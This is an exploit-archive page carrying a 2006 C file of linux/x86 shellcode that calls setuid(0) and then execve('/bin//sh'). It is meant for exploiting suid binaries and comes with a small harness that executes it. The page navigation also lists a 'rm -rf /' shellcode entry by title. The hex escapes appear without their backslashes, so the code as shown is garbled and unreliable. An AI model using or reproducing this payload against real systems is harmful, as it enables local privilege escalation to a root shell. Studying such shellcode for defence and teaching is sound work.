[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : linux/x86 setuid(0) + execve(/bin/sh) 28 bytes
# Published : 2006-11-16
# Author : Revenge
# Previous Title : linux/x86 execve(rm -rf /) shellcode 45 bytes
# Next Title : linux/x86 execve(/bin/sh) 22 bytes


/*
 * revenge-setuid.c, v1.0 2006/09/30 14:57
 *
 * linux/x86 setuid(0) + execve("/bin//sh", ["/bin//sh"], NULL) shellcode
 * once again...
 *
 * [    setuid (6 bytes) + execve (22 bytes)  = 28 bytes       ]
 * [                                                           ]
 * [    Same as revenge-execve.c we start the 2 system         ]
 * [    calls with a mov resulting in 2 bytes less, but        ]
 * [    this one is only for suid binary exploitation.         ]
 * [                                                           ]
 *
 * http://www.0xcafebabe.it
 * <revenge@0xcafebabe.it>
 *
 */

char sc[] =
                                     // <_start>
       "xb0x17"                    // mov    $0x17,%al
       "x31xdb"                    // xor    %ebx,%ebx
       "xcdx80"                    // int    $0x80
       "xb0x0b"                    // mov    $0xb,%al
       "x99"                        // cltd
       "x52"                        // push   %edx
       "x68x2fx2fx73x68"        // push   $0x68732f2f
       "x68x2fx62x69x6e"        // push   $0x6e69622f
       "x89xe3"                    // mov    %esp,%ebx
       "x52"                        // push   %edx
       "x53"                        // push   %ebx
       "x89xe1"                    // mov    %esp,%ecx
       "xcdx80"                    // int    $0x80
;

int main()
{
       void    (*fp)(void) = (void (*)(void))sc;

       printf("Length: %dn",strlen(sc));
       fp();
}

// www.Syue.com [2006-11-16]